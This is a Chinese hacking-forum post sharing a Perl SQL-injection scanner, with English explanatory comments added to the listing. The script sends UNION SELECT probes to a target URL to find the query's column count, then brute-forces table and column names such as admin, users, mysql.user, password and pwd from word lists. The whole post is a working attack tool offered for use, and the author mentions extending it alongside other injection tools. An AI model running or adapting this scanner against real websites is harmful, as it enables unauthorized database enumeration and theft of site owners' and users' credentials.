[原创]字段和表段扫描perl版
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])文章作者:outstand
[language=perl]#by 小杰 thanks for my all friends.
#578757691#163.com
#[url]http://hi.baidu.com/hnnsg[/url]
#!/usr/bin/perl
#usage: perl perl.pl [url]http://www...[/url]
# --- main program ----------------------------------------------------------
# Probes a URL whose trailing parameter reaches a SQL statement unescaped and
# enumerates, in three passes, (1) the column count of that query, (2) table
# names from a word list, (3) column names from a word list. Every pass works
# the same way: one GET per candidate, and a response counts as a hit when it
# contains $keywords. The comments below describe what each step emits, since
# the request shape (the "/**/and/**/1=1/**/union/**/select/**/" prefix,
# numbered columns, trailing "/*") is exactly what a WAF rule or an access-log
# search would key on.
#
# The "#!/usr/bin/perl" line of this listing is not the first line, so it is
# only a comment here. There is no "use strict"/"use warnings": apart from
# @url and $lengh every variable is a package global, which is also how get()
# ends up localising this program's $url.
use IO::Socket;
# Marker looked for in every response (unanchored, case-sensitive regex match;
# not quotemeta'd, so regex metacharacters in it would be interpreted).
$keywords="TOM";
# Extra word lists, read by gettextlist() relative to the current directory.
$Dict_Table="Dict_Table.txt";
$Dict_Field="Dict_Field.txt";
# Built-in candidate table names; the file contents are appended below.
@tabledic= ("name","pwd","jobs","links","users","username","usernames","mysql.user","member","members","admin","administrator","administrators","login","logins","logon","userrights","superuser","control","usercontrol","author","autore","artikel","newsletter","tb_user","tb_users","tb_username","tb_usernames","tb_admin","tb_administrator","tb_member","tb_members","tb_login","perdorues","korisnici","webadmin","webadmins","webuser","webusers","webmaster","webmasters","customer","customers","sysuser","sysusers","sysadmin","sysadmins","memberlist","tbluser","tbl_user","tbl_users","a_admin","x_admin","m_admin","adminuser","admin_user","adm","userinfo","user_info","admin_userinfo","userlist","user_list","user_admin","user_login","admin_user","admin_login","login_user","login_users","login_admin","login_admins","sitelogin","site_login","sitelogins","site_logins","SiteLogin","Site_Login","User","Users","Admin","Admins","Login","Logins","adminrights","news","table","tables","perdoruesit");
# Built-in candidate column names; see the later @fielddic assignment for the
# list that pass 3 actually iterates.
@fielddic= ("admin","name","jobname","user","username","password","passwd","pass","email","emri","fjalekalimi","pwd","user_name","user_password","name","id","user_pass","admin_user","admin_password","user_pass","admin_pass","usern","user_n","users","login","logins","login_user","login_admin","login_username","user_username","user_login","auid","apwd","adminid","admin_id","adminuser","admin_user","adminuserid","admin_userid","adminusername","admin_username","adminname","admin_name","usr","usr_n","usrname","usr_name","usrpass","usr_pass","usrnam","nc","uid","userid","user_id","myusername","mail","emni","logohu","punonjes","kpro_user","wp_users","emniplote","perdoruesi","perdorimi","punetoret","logini","llogaria","fjalekalimin","kodi","emer","ime","korisnik","korisnici","user1","administrator","administrator_name","mem_login","login_password","login_pass","login_passwd","login_pwd","sifra","lozinka","psw","pass1word","pass_word","passw","pass_w","user_passwd","userpass","userpassword","userpwd","user_pwd","useradmin","user_admin","mypassword","passwrd","admin_pwd","admin_pass","admin_passwd","mem_password","memlogin","userid","admin_id","adminid","e_mail","usrn","u_name","uname","mempassword","mem_pass","mem_passwd","mem_pwd","p_word","pword","p_assword","myusername","myname","my_username","my_name","my_password","my_email");
# Target URL: first command-line argument, else prompted for. "@ARGV[0]" is a
# one-element slice; it works but would warn under "use warnings".
if (!@ARGV){
print "please inset the url:";
chomp($url=<STDIN>);
}else{
$url=@ARGV[0];
}
# Prepend the scheme when "http://" appears nowhere in the string.
if($url !~ /http:\/\//) {
$url= "http://".$url;
}
# Match result and captures are unused; get() re-parses the URL itself.
$url =~ m/http:\/\/(.*?)\/(.*)/;
my @url=();   # never read: the only push onto it is commented out
my $lengh;    # column count found by pass 1; stays undef if no probe matched
# Pass 1: for len = 1..50 request
#   <url>/**/and/**/1=1/**/union/**/select/**/1,2,...,len/*
# and stop at the first response that contains $keywords.
foreach $len(1..50)
{
$one=$url."/**/and/**/1=1/**/union/**/select/**/";
for($i=1;$i<=$len; $i++)
{
$one=$one.$i;
if($i==$len){
next;   # no comma after the last column
}
$one=$one.",";
}
$one=$one."/*";
# Windows console clear; on other platforms the shell reports an unknown
# command on every iteration.
system("cls");
print "[+]scan field length...\n";
print "$one \n";
$data=get("$one");   # 0 on connect failure, "" when get() cannot parse the URL
#push @url,$one;
if($data=~/$keywords/)
{
$lengh=$len;
print "[-]field length is : $len \n";
#print $data;
last;
}
}
# After the loop $one still holds the last probe sent (ending in "/*") and
# pass 2 builds on it. If nothing matched, $one is the 50-column probe and
# $lengh is undef, so the inner loop of pass 3 runs zero times.
print "[+]start scan table...\n";
@tlist=gettextlist($Dict_Table);
@tabledic=(@tabledic,@tlist);   # built-ins + Dict_Table.txt; duplicates are kept
#print "@tabledic";
@flist=gettextlist($Dict_Field);
# Column candidates = the (already extended) table list + Dict_Field.txt. The
# built-in @fielddic from the top of the script is not part of this list.
@fielddic=(@tabledic,@flist);
#print "@fielddic";
# Pass 2: one request per candidate table. Because $one ends in "/*",
# appending "*/from/**/<table>/*" produces ".../**/from/**/<table>/*".
foreach $table(@tabledic)
{
$two=$one."*/from/**/$table/*";
#print "$two \n";
$data=get("$two");
if($data=~/$keywords/)
{
#print "[-] $table\n";
push @table,$table;   # global array of hits, printed after the loop
}
}
foreach(@table)
{
print "[-] $_ \n";
}
# Pass 3 setup: which table to scan and which column position receives the
# candidate name; empty answers fall back to the defaults below.
print "[+]start scan field...\n";
print "[+]please inset you want to scan the table:";
chomp($tableone=<STDIN>);
print "[+]please check the field length:";
chomp($fieldindex=<STDIN>);
if (!$tableone){
$tableone="mysql.user";
print " table is unset,value is set $tableone \n";
}
if (!$fieldindex){
$fieldindex="4";
print " the fieldindex is unset,value is set $fieldindex \n";
}
# Pass 3: one request per candidate column name, selecting 1..$lengh with the
# candidate substituted at position $fieldindex, from $tableone.
foreach $field(@fielddic)
{
local $three;   # "local" on a package global, not a lexical
$three=$url."/**/and/**/1=1/**/union/**/select/**/";
#print "\n$lengh";
for($i=1;$i<=$lengh; $i++)
{
if($i==$fieldindex)
{
$three=$three.$field;
$three=$three.",";
next;
}
$three=$three.$i;
if($i==$lengh){
next;
}
$three=$three.",";
}
$three=$three."/**/from/**/$tableone/*";
#print "$three";
$data=get("$three");
if($data=~/$keywords/)
{
print "[-] $field\n";
push @field,$field;
}
}
foreach(@field)
{
print "[-] $_ \n";
}
print "------end------";
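# Read one word-list file and return its lines with the trailing newline
# removed (chomp strips only $/, so a CR from a CRLF file stays on the line,
# as before).
#
# Args:    $textname - path of the list file ($Dict_Table / $Dict_Field at the
#                      top of the script), resolved against the current
#                      working directory.
# Returns: the lines in file order; the element count in scalar context.
# Dies:    when the file cannot be opened, with the original message.
#
# Changes from the original: three-argument open with a lexical filehandle
# (the two-argument form lets a leading "<", ">" or "|" in the name select the
# open mode), one line read at a time instead of slurping the whole file into
# the foreach list, and the handle is closed explicitly. The empty prototype
# was dropped; it was never enforced, since both call sites precede this sub.
sub gettextlist
{
    my ($textname) = @_;
    my @textlist;
    open my $fh, '<', $textname or die "Can't open '$textname': $!";
    while (my $line = <$fh>) {
        chomp $line;
        push @textlist, $line;
    }
    close $fh;
    return @textlist;
}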
#thanks the google
# ALRM handler that get() installs right before reading the response.
# It closes the script-global socket, which is meant to end the readline
# loop in get() instead of leaving it blocked; the return value is simply
# whatever close() reported.
sub timeout()
{
    my $closed = close $sock;
    return $closed;
}
# Minimal HTTP/1.0 fetch used by all three passes. Takes one URL string and
# returns the raw response (status line, headers and body, unparsed) as a
# string; returns 0 when the TCP connect fails and "" when the URL does not
# match the pattern below (host, then "/", then at least one character).
# The empty prototype is not enforced for the calls above, which precede this
# definition.
#
# Every variable here is a package global under "local", including $url —
# the same $url the main program uses; its value is restored on return.
# $sock is also global so that timeout() can close it.
sub get()
{
local $request = $_[0];
local $port = 80;
local $temp = "";
if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/)
{
# Optional ":port" suffix (2-5 digits) on the host part.
if($server =~ /^([^\:]+)\:([0-9]{2,5})$/){ $server = $1; $port = $2; }
$sock = IO::Socket::INET->new(
PeerAddr => $server,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM,
# $timeout is never assigned anywhere in this listing, and IO::Socket::INET's
# option is spelled "Timeout", so this key appears to have no effect: the
# connect relies on the OS default and only the read loop below is bounded.
TimeOut => $timeout
) or return 0; # connection failed
# Request line carries the captured path verbatim (no URL encoding); the only
# header sent is Host (no User-Agent), over plain HTTP.
print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n";
# 10-second read budget: on ALRM, timeout() closes $sock, which is meant to
# end the readline loop below.
$SIG{ALRM} = \&timeout; alarm 10;
while(<$sock>){ $temp .= $_; }
alarm 0; close $sock;
}
return $temp;
}[/language]
方便搜集字典,自己定义关键字和字典,array形式和txt形式的,但是会重复,本来想写下过滤掉重复的,但是最近忙,将就下哈! 表段好像不是很全啊~~ 结合明小子 啊d nbsi 等再添加一些